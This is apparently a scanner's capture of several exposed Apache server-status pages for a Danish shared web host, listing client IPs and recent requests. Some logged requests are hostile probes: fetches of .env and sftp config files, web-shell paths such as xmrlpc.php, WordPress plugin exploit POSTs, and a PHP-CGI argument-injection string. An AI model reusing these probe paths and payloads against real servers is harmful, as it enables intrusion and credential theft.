0.09376000.00.000.02 217.196.107.80webhotel5.webhosting.dkGET /506f6f603b5c.php HTTP/1.0 49-4-0/0/47. 0.07376000.00.000.01 52.237.239.7webhotel5.webhosting.dkHEAD /home HTTP/1.0 50-4-0/0/47. 0.08376000.00.000.02 52.237.239.7webhotel5.webhosting.dkHEAD /main HTTP/1.0 51-4-0/0/47. 0.08375900.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3eebed7eb
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 08-Nov-2024 17:48:20 CET Restart Time: Friday, 08-Nov-2024 16:10:04 CET Parent Server Generation: 1 Server uptime: 1 hour 38 minutes 15 seconds Total accesses: 8947 - Total Traffic: 7.7 MB CPU Usage: u1.02 s.44 cu0 cs0 - .0248% CPU load 1.52 requests/sec - 1363 B/second - 898 B/request 1 requests currently being processed, 34 idle workers _W_________________________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1144640/24/287_ 0.013000.00.000.40 139.135.71.238webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-1144840/22/283W 0.02000.00.011.48 81.19.232.86webhotel5.webhosting.dkGET /server-status HTTP/1.0 2-1144650/24/282_ 0.02000.00.011.42 81.19.232.86webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 3-1144890/19/278_ 0.022600.00.000.07 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 4-1144900/19/278_ 0.022600.00.001.43 95.108.213.118webhotel5.webhosting.dkGET /modeller/detaljer/Brigitta-Bulgari-586 HTTP/1.0 5-1144850/21/281_ 0.035300.00.000.09 155.248.250.253webhotel5.webhosting.dkGET /clusterMgr/K6Ft22.jsp;.js HTTP/1.0 6-1144910/19/278_ 0.02000.00.000.09 81.19.232.86webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 7-1144920/18/277_ 0.016300.00.000.12 64.124.8.177webhotel5.webhosting.dkGET /stueplanter-dk/udestueplanter HTTP/1.0 8-1144930/16/273_ 0.012600.00.000.08 139.135.71.238webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-1144940/16/271_ 0.021830.00.000.07 92.255.85.164webhotel5.webhosting.dkGET / HTTP/1.0 10-1144950/16/273_ 0.011500.00.050.18 213.180.203.23webhotel5.webhosting.dkGET /film/alle/nyeste?film_page=4 HTTP/1.0 11-1144960/16/276_ 0.01030.00.000.17 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 12-1144970/16/260_ 0.02000.00.000.08 81.19.232.86webhotel5.webhosting.dkGET /server HTTP/1.0 13-1144980/16/230_ 0.01000.00.000.06 81.19.232.86webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 14-1144990/16/230_ 0.02000.00.010.28 81.19.232.86webhotel5.webhosting.dkGET /about HTTP/1.0 15-1145000/16/229_ 0.01000.00.000.06 81.19.232.86webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 16-1144630/24/235_ 0.023130.00.010.08 5.133.192.171webhotel5.webhosting.dkGET / HTTP/1.0 17-1145020/14/228_ 0.011300.00.000.07 81.19.232.86webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 18-1145030/14/225_ 0.011340.00.000.07 81.19.232.86webhotel5.webhosting.dkHEAD / HTTP/1.0 19-1145040/14/226_ 0.011200.00.000.07 81.19.232.86webhotel5.webhosting.dkHEAD /wp HTTP/1.0 20-1145050/14/226_ 0.011200.00.000.10 81.19.232.86webhotel5.webhosting.dkHEAD /bc HTTP/1.0 21-1145060/14/228_ 0.001200.00.000.06 81.19.232.86webhotel5.webhosting.dkHEAD /bk HTTP/1.0 22-1145070/14/223_ 0.011200.00.010.07 81.19.232.86webhotel5.webhosting.dkHEAD /backup HTTP/1.0 23-1145080/14/227_ 0.011100.00.000.08 81.19.232.86webhotel5.webhosting.dkHEAD /old HTTP/1.0 24-1145090/14/223_ 0.011100.00.010.06 81.19.232.86webhotel5.webhosting.dkHEAD /new HTTP/1.0 25-1145100/14/225_ 0.011100.00.000.06 81.19.232.86webhotel5.webhosting.dkHEAD /main HTTP/1.0 26-192690/34/197_ 0.033100.00.010.05 5.133.192.171webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 27-1144790/24/184_ 0.0253470.00.000.04 124.70.203.191webhotel5.webhosting.dkGET / HTTP/1.0 28-1145110/14/176_ 0.001100.00.000.04 81.19.232.86webhotel5.webhosting.dkHEAD /home HTTP/1.0 29-1145120/14/176_ 0.01900.00.000.05 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 30-1145130/14/173_ 0.017210.00.020.08 81.19.232.100webhotel5.webhosting.dkGET /server-status HTTP/1.0 31-1145140/14/175_ 0.01530.00.000.06 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 32-1145150/13/171_ 0.01200.00.000.09 127.0.0.1webhotel5.webhosting.dkPOST / HTTP/1.0 33-1145160/14/175_ 0.01000.00.000.14 81.19.232.86webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 34-1145170/14/171_ 0.01040.00.010.07 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 35-1-0/0/146. 0.1054800.00.000.04 52.169.1.245webhotel5.webhosting.dkGET /wp-content/gallery/about.php HTTP/1.0 36-0-0/0/46. 0.07342100.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-admin/js/widgets/xmrlpc.php?p= HTTP/1.0 37-0-0/0/46. 0.07341000.00.000.02 52.237.233.59webhotel5.webhosting.dkGET /wp-content/updraft/about.php HTTP/1.0 38-0-0/0/47. 0.06341500.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/plugins/dropdown.php HTTP/1.0 39-0-0/0/47. 0.07341500.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/plugins/linkpreview/db.php?u HTTP/1.0 40-0-0/0/47. 0.07341300.00.000.01 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-0-0/0/46. 0.07341300.00.000.03 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-0-0/0/46. 0.05341300.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/plugins/wp-conflg.php HTTP/1.0 43-0-0/0/46. 0.06341200.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.0 44-0-0/0/47. 0.05341200.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/repeater.php HTTP/1.0 45-0-0/0/47. 0.07341200.00.000.02 52.237.233.59webhotel5.webhosting.dkGET /wp-content/themes/404.php HTTP/1.0 46-0-0/0/46. 0.06341200.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/themes.php HTTP/1.0 47-0-0/0/47. 0.07341100.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/themes/admin.php HTTP/1.0 48-0-0/0/46. 0.06341100.00.000.01 52.237.233.59webhotel5.webhosting.dkGET /wp-content/themes/pridmag/db.php?u HTTP/1.0 49-0-0/0/47. 0.06341100.00.000.03 52.237.233.59webhotel5.webhosting.dkGET /wp-content/themes/seotheme/db.php?u HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / thi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde38882da58
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 06-Nov-2024 13:22:08 CET Restart Time: Wednesday, 06-Nov-2024 06:05:03 CET Parent Server Generation: 7 Server uptime: 7 hours 17 minutes 4 seconds Total accesses: 39748 - Total Traffic: 18.0 MB CPU Usage: u1.58 s.74 cu0 cs0 - .00885% CPU load 1.52 requests/sec - 720 B/second - 475 B/request 1 requests currently being processed, 29 idle workers ___________________W_______...___............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-7178030/1/1206_ 0.00300.00.000.78 146.70.161.238webhotel5.webhosting.dkGET /gallery/ HTTP/1.0 1-7178310/1/1211_ 0.00110.00.000.53 81.19.232.86webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 2-7178490/1/1201_ 0.00110.00.000.47 81.19.232.86webhotel5.webhosting.dkGET /server HTTP/1.0 3-7178500/1/1194_ 0.00110.00.000.56 81.19.232.86webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 4-7178510/1/1202_ 0.00010.00.000.56 81.19.232.86webhotel5.webhosting.dkGET /about HTTP/1.0 5-7178520/1/1203_ 0.00010.00.000.54 81.19.232.86webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 6-7178660/0/1201_ 0.062500.00.000.52 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/twenty/ HTTP/1.0 7-7178670/0/1206_ 0.0625540.00.000.46 87.120.114.239webhotel5.webhosting.dkPOST / HTTP/1.0 8-7178730/0/1202_ 0.072400.00.000.53 87.120.114.239webhotel5.webhosting.dkGET /.env HTTP/1.0 9-7178740/0/1196_ 0.062400.00.000.86 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/finley/ HTTP/1.0 10-7178750/0/1196_ 0.072400.00.000.50 87.120.114.239webhotel5.webhosting.dkGET /.env HTTP/1.0 11-7179160/0/1198_ 0.061900.00.000.63 146.70.161.238webhotel5.webhosting.dkGET /libraries/joomla/ HTTP/1.0 12-7179490/0/1189_ 0.051800.00.000.47 146.70.161.238webhotel5.webhosting.dkGET /filemanager/ HTTP/1.0 13-7179650/0/1181_ 0.061400.00.000.50 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/travel/ HTTP/1.0 14-7179770/0/1190_ 0.061200.00.000.41 46.122.98.94webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 15-7179500/0/1197_ 0.0618210.00.000.46 157.250.160.25www.hvilsted.dkPOST / HTTP/1.0 16-7179940/0/1191_ 0.061100.00.000.42 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/travelscape/ HTTP/1.0 17-7179950/0/1199_ 0.071100.00.000.61 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/intense/ HTTP/1.0 18-7180810/0/1189_ 0.06700.00.000.37 146.70.161.238webhotel5.webhosting.dkGET /storage/ HTTP/1.0 19-7178650/0/1106W 0.06000.00.000.79 81.19.232.86webhotel5.webhosting.dkGET /server-status HTTP/1.0 20-7178760/0/1094_ 0.062400.00.000.38 146.70.161.238webhotel5.webhosting.dkGET /blog/wp-includes/Text/Diff/Renderer/ HTTP/1.0 21-7181120/0/1071_ 0.04500.00.000.46 87.120.114.239webhotel5.webhosting.dkGET /.env HTTP/1.0 22-7181290/0/1060_ 0.06400.00.000.46 146.70.161.238webhotel5.webhosting.dkGET /vendor/composer/ HTTP/1.0 23-7181300/0/1086_ 0.06440.00.000.78 87.120.114.239webhotel5.webhosting.dkPOST / HTTP/1.0 24-7181510/0/1074_ 0.07100.00.000.45 146.70.161.238webhotel5.webhosting.dkGET /web/ HTTP/1.0 25-7181520/0/1009_ 0.05000.00.000.39 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/signify/ HTTP/1.0 26-7181530/0/954_ 0.07040.00.000.51 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 27-7-0/0/960. 0.06340.00.000.53 87.120.114.239webhotel5.webhosting.dkPOST / HTTP/1.0 28-7-0/0/960. 0.05100.00.000.46 97.81.151.60webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 29-7-0/0/943. 0.05130.00.000.38 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 30-7130360/44/846_ 0.061600.00.010.32 146.70.161.238webhotel5.webhosting.dkGET /wp-content/themes/astra/inc/ HTTP/1.0 31-7178530/1/775_ 0.00010.00.000.43 81.19.232.86webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 32-7178540/1/747_ 0.00010.00.000.27 81.19.232.86webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 33-7-0/0/598. 0.0562700.00.000.19 87.120.114.239webhotel5.webhosting.dkGET /.env HTTP/1.0 34-7-0/0/588. 0.0662700.00.000.22 45.134.212.247webhotel5.webhosting.dkGET /zany.php HTTP/1.0 35-7-0/0/298. 0.0662900.00.000.09 45.134.212.247webhotel5.webhosting.dkGET /cong.php HTTP/1.0 36-7-0/0/254. 0.0362400.00.000.12 45.134.212.247webhotel5.webhosting.dkGET /ayk.php HTTP/1.0 37-7-0/0/206. 0.0662340.00.000.06 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 38-7-0/0/196. 0.0562200.00.000.06 157.250.160.25www.qwist.dkGET /RDWeb/Pages/ HTTP/1.0 39-7-0/0/195. 0.05622200.00.000.06 157.250.160.25www.qwist.dkGET /RDWeb/Pages/ HTTP/1.0 40-7-0/0/194. 0.0662200.00.000.06 157.250.160.25www.qwist.dkGET /RDWeb/Pages/ HTTP/1.0 41-7-0/0/195. 0.0662200.00.000.09 157.250.160.25www.qwist.dkGET /RDWeb/Pages/ HTTP/1.0 42-7-0/0/194. 0.0562200.00.000.08 157.250.160.25www.qwist.dkGET /RDWeb/Pages/ HTTP/1.0 43-4-0/0/100. 0.08864400.00.000.06 52.169.219.67webhotel5.webhosting.dkGET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.0 44-4-0/0/97. 0.08864400.00.000.05 52.169.219.67webhotel5.webhosting.dkGET /wp-admin/xmrlpc.php?p= HTTP/1.0 45-4-0/0/96. 0.07864400.00.000.03 52.169.219.67webhotel5.webhosting.dkGET /text.php HTTP/1.0 46-4-0/0/100. 0.07864400.00.000.03 52.169.219.67webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/xmrlpc.php?p= HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3cd0870dd
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 04-Nov-2024 17:34:15 CET Restart Time: Monday, 04-Nov-2024 16:10:06 CET Parent Server Generation: 1 Server uptime: 1 hour 24 minutes 9 seconds Total accesses: 5981 - Total Traffic: 4.9 MB CPU Usage: u1.41 s.59 cu0 cs0 - .0396% CPU load 1.18 requests/sec - 1022 B/second - 862 B/request 1 requests currently being processed, 30 idle workers ______________W_______.._________............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1356830/21/187_ 0.042000.00.010.08 78.153.140.218webhotel5.webhosting.dkGET /vendor/.env HTTP/1.0 1-1356570/20/187_ 0.03000.00.010.08 188.166.108.93webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 2-1356840/21/189_ 0.042080.00.010.63 45.148.10.69webhotel5.webhosting.dkGET / HTTP/1.0 3-1356710/21/188_ 0.05201100.00.010.09 93.174.93.127webhotel5.webhosting.dkGET / HTTP/1.0 4-1357100/20/185_ 0.041310.00.010.16 149.88.106.151www.mercasol-frv.dkGET /templates/atomic/templates.phpp HTTP/1.0 5-1356890/21/188_ 0.051900.00.010.08 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-1357110/20/186_ 0.041000.00.010.13 149.88.106.151www.mercasol-frv.dkGET /wp-2019.php HTTP/1.0 7-1356900/21/187_ 0.05181020.00.010.07 192.170.136.141webhotel5.webhosting.dkGET / HTTP/1.0 8-1356910/21/187_ 0.061800.00.020.10 149.88.106.151www.mercasol-frv.dkGET /cgi-bin/install.php HTTP/1.0 9-1356920/21/187_ 0.041500.00.010.07 149.88.106.151www.mercasol-frv.dkGET /wp-includes/Text/file.php HTTP/1.0 10-1357040/21/189_ 0.051520.00.010.14 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 11-1357530/20/188_ 0.04010.00.010.08 188.166.108.93webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 12-1357160/19/186_ 0.03400.00.010.28 127.0.0.1webhotel5.webhosting.dkGET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.0 13-1363530/18/182_ 0.03010.00.010.07 188.166.108.93webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-1357630/19/185W 0.06000.00.000.07 188.166.108.93webhotel5.webhosting.dkGET /server-status HTTP/1.0 15-1365110/18/181_ 0.05060.00.010.08 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 16-1357900/20/185_ 0.032200.00.010.10 149.88.106.151www.mercasol-frv.dkGET /gecko.php HTTP/1.0 17-1357910/20/185_ 0.052200.00.010.07 78.153.140.218webhotel5.webhosting.dkGET /pinfo.php HTTP/1.0 18-1359870/20/185_ 0.04130.00.010.08 149.88.106.151www.mercasol-frv.dkGET /wordpress/wp-content/uploads/wp-mailcek.php HTTP/1.0 19-1360030/19/186_ 0.03000.00.010.08 188.166.108.93webhotel5.webhosting.dkGET /about HTTP/1.0 20-1360040/19/187_ 0.05000.00.010.10 188.166.108.93webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-1365180/17/183_ 0.03000.00.010.08 188.166.108.93webhotel5.webhosting.dkGET /server HTTP/1.0 22-1-0/0/164. 0.1031900.00.000.07 155.248.250.253webhotel5.webhosting.dk-content/plugins/age-verification/age-verification.php HTTP/1.0 23-1-0/0/166. 0.0910100.00.000.07 52.237.239.101webhotel5.webhosting.dkGET //atomlib.php HTTP/1.0 24-1350190/29/147_ 0.06710.00.010.07 149.88.106.151www.mercasol-frv.dkGET /wp-includes/block-patterns/themes.php HTTP/1.0 25-1356250/21/139_ 0.04050.00.010.06 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 26-1356580/21/139_ 0.04010.00.010.06 188.166.108.93webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-1357170/20/136_ 0.04560.00.010.08 149.88.106.151www.mercasol-frv.dkGET /ws.php HTTP/1.0 28-1357180/20/137_ 0.03300.00.010.06 149.88.106.151www.mercasol-frv.dkGET /chosen.php HTTP/1.0 29-1357190/20/137_ 0.03100.00.010.08 35.181.43.118webhotel5.webhosting.dkGET /wp-includes/PHPMailer/radio.php HTTP/1.0 30-1357640/19/136_ 0.042500.00.010.05 78.153.140.218webhotel5.webhosting.dkGET /vendor/.env HTTP/1.0 31-1357920/20/123_ 0.042100.00.011.46 188.27.248.214webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 32-1357930/20/119_ 0.0520100.00.010.05 87.236.176.157webhotel5.webhosting.dkGET / HTTP/1.0 33-1-0/0/100. 0.1233910.00.000.03 13.38.95.161webhotel5.webhosting.dkGET /backup HTTP/1.0 34-1-0/0/100. 0.1135300.00.000.03 149.88.106.151www.mercasol-frv.dkGET /wp-includes/blocks/button/index.php HTTP/1.0 35-1-0/0/48. 0.0932400.00.000.01 13.38.95.161webhotel5.webhosting.dkGET /2010 HTTP/1.0 36-1-0/0/49. 0.0933700.00.000.01 13.38.95.161webhotel5.webhosting.dkGET /BACKUP HTTP/1.0 37-1-0/0/48. 0.1033700.00.000.03 149.88.106.151www.mercasol-frv.dkGET /wp-content/uploads/2022/bidlbdgp.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3d6a0b3ec
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 02-Nov-2024 17:44:13 CET Restart Time: Saturday, 02-Nov-2024 16:10:05 CET Parent Server Generation: 1 Server uptime: 1 hour 34 minutes 8 seconds Total accesses: 14875 - Total Traffic: 6.5 MB CPU Usage: u3.44 s1.41 cu0 cs0 - .0859% CPU load 2.63 requests/sec - 1202 B/second - 456 B/request 1 requests currently being processed, 30 idle workers ___W___________________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1385400/9/442_ 0.04000.00.000.19 178.128.207.138webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 1-1388390/8/441_ 0.05169010.00.000.19 159.148.128.108webhotel5.webhosting.dkGET / HTTP/1.0 2-1385420/9/391_ 0.05000.00.000.13 178.128.207.138webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 3-1387000/8/391W 0.04000.00.000.15 178.128.207.138webhotel5.webhosting.dkGET /server-status HTTP/1.0 4-1388130/8/390_ 0.063060.00.000.17 108.162.245.177webhotel5.webhosting.dkGET /?find-new%2F1272239%2Fposts HTTP/1.0 5-1389350/8/357_ 0.07260.00.000.12 108.162.245.97webhotel5.webhosting.dkGET /?find-new%2F1275600%2Fposts HTTP/1.0 6-1389390/8/390_ 0.061130.00.010.12 66.249.73.39www.tutak.dklga2/slides/143%20Bagsiden%20af%20Gorkijs%20hus_t.html HTTP/1.0 7-1390220/8/390_ 0.04060.00.000.14 178.128.207.138webhotel5.webhosting.dkGET / HTTP/1.0 8-1390890/8/390_ 0.05000.00.000.19 178.128.207.138webhotel5.webhosting.dkGET /about HTTP/1.0 9-1391000/8/389_ 0.04010.00.000.14 178.128.207.138webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-1391040/8/390_ 0.05010.00.000.24 178.128.207.138webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-1391270/7/389_ 0.042170.00.000.18 172.71.150.39webhotel5.webhosting.dkGET /?find-new%2F1273436%2Fposts HTTP/1.0 12-1391350/7/389_ 0.042180.00.010.14 205.210.31.56webhotel5.webhosting.dkGET / HTTP/1.0 13-1391410/7/389_ 0.03980.00.000.31 162.158.42.13webhotel5.webhosting.dkGET /?find-new%2F1274377%2Fposts HTTP/1.0 14-1391870/7/389_ 0.05590.00.000.14 162.158.41.24webhotel5.webhosting.dkGET /?find-new%2F1275319%2Fposts HTTP/1.0 15-1391950/7/389_ 0.04460.00.000.27 162.158.41.232webhotel5.webhosting.dkGET /?find-new%2F1275405%2Fposts HTTP/1.0 16-1391960/7/387_ 0.04220.00.000.23 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 17-1392610/7/388_ 0.03080.00.000.20 108.162.245.4webhotel5.webhosting.dkGET /?find-new%2F1275785%2Fposts HTTP/1.0 18-1392620/7/388_ 0.04000.00.000.17 178.128.207.138webhotel5.webhosting.dkGET /server HTTP/1.0 19-1392630/7/388_ 0.04010.00.000.23 178.128.207.138webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 20-1392860/6/387_ 0.043580.00.000.15 172.71.150.154webhotel5.webhosting.dkGET /?find-new%2F1271824%2Fposts HTTP/1.0 21-1392870/6/387_ 0.032700.00.000.15 47.128.58.215webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 22-1392880/6/337_ 0.052590.00.000.11 162.158.41.232webhotel5.webhosting.dkGET /?find-new%2F1272535%2Fposts HTTP/1.0 23-1392890/6/337_ 0.0320110.00.000.12 198.244.213.98webhotel5.webhosting.dkGET / HTTP/1.0 24-1392900/6/337_ 0.051160.00.000.18 162.158.41.57webhotel5.webhosting.dkGET /?find-new%2F1274339%2Fposts HTTP/1.0 25-1392910/6/329_ 0.041490.00.000.11 172.71.151.81webhotel5.webhosting.dkGET /?find-new%2F1274308%2Fposts HTTP/1.0 26-1393780/5/329_ 0.033370.00.000.11 172.71.150.58webhotel5.webhosting.dkGET /?find-new%2F1272223%2Fposts HTTP/1.0 27-1396760/4/328_ 0.01060.00.000.12 178.128.207.138webhotel5.webhosting.dkGET / HTTP/1.0 28-1396840/3/327_ 0.011780.00.000.12 172.71.147.92webhotel5.webhosting.dkGET /?find-new%2F1274179%2Fposts HTTP/1.0 29-1396930/3/327_ 0.0291090.00.000.11 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 30-1396940/3/327_ 0.01760.00.000.35 172.71.147.133webhotel5.webhosting.dkGET /?find-new%2F1274775%2Fposts HTTP/1.0 31-1-0/0/324. 0.12123170.00.000.12 162.158.41.88webhotel5.webhosting.dkGET /?find-new%2F1043163%2Fposts HTTP/1.0 32-1-0/0/300. 0.0931900.00.000.10 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-1-0/0/250. 0.1218800.00.000.10 84.239.17.10webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 34-1-0/0/250. 0.186400.00.000.09 78.153.140.222webhotel5.webhosting.dkGET /.env HTTP/1.0 35-1-0/0/250. 0.1210400.00.000.07 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-1-0/0/250. 0.1129110.00.000.08 213.180.203.158webhotel5.webhosting.dkGET /film/detaljer/Coming-On-America-9876 HTTP/1.0 37-1-0/0/200. 0.13134280.00.000.06 172.68.23.178webhotel5.webhosting.dkGET /?find-new%2F1025533%2Fposts HTTP/1.0 38-1-0/0/174. 0.1218570.00.000.06 135.148.100.196webhotel5.webhosting.dkGET / HTTP/1.0 39-1-0/0/124. 0.1233700.00.000.04 139.59.237.76webhotel5.webhosting.dkGET /wp-includes/rest-api/admin.php HTTP/1.0 40-1-0/0/74. 0.12131100.00.000.03 162.158.42.157webhotel5.webhosting.dkGET /?find-new%2F1028459%2Fposts HTTP/1.0 41-1-0/0/74. 0.1412100.00.000.02 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-1-0/0/74. 0.1128510020.00.000.02 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 43-1-0/0/74. 0.1113700.00.000.03 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 44-1-0/0/74. 0.147380.00.000.03 172.71.147.133webhotel5.webhosting.dkGET /?find-new%2F1258327%2Fposts HTTP/1.0 45-1-0/0/74. 0.1116500.00.000.02 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 46-1-0/0/50. 0.1213210.00.000.04 77.60.86.182webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 47-1-0/0/50. 0.1317730.00.000.02 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css 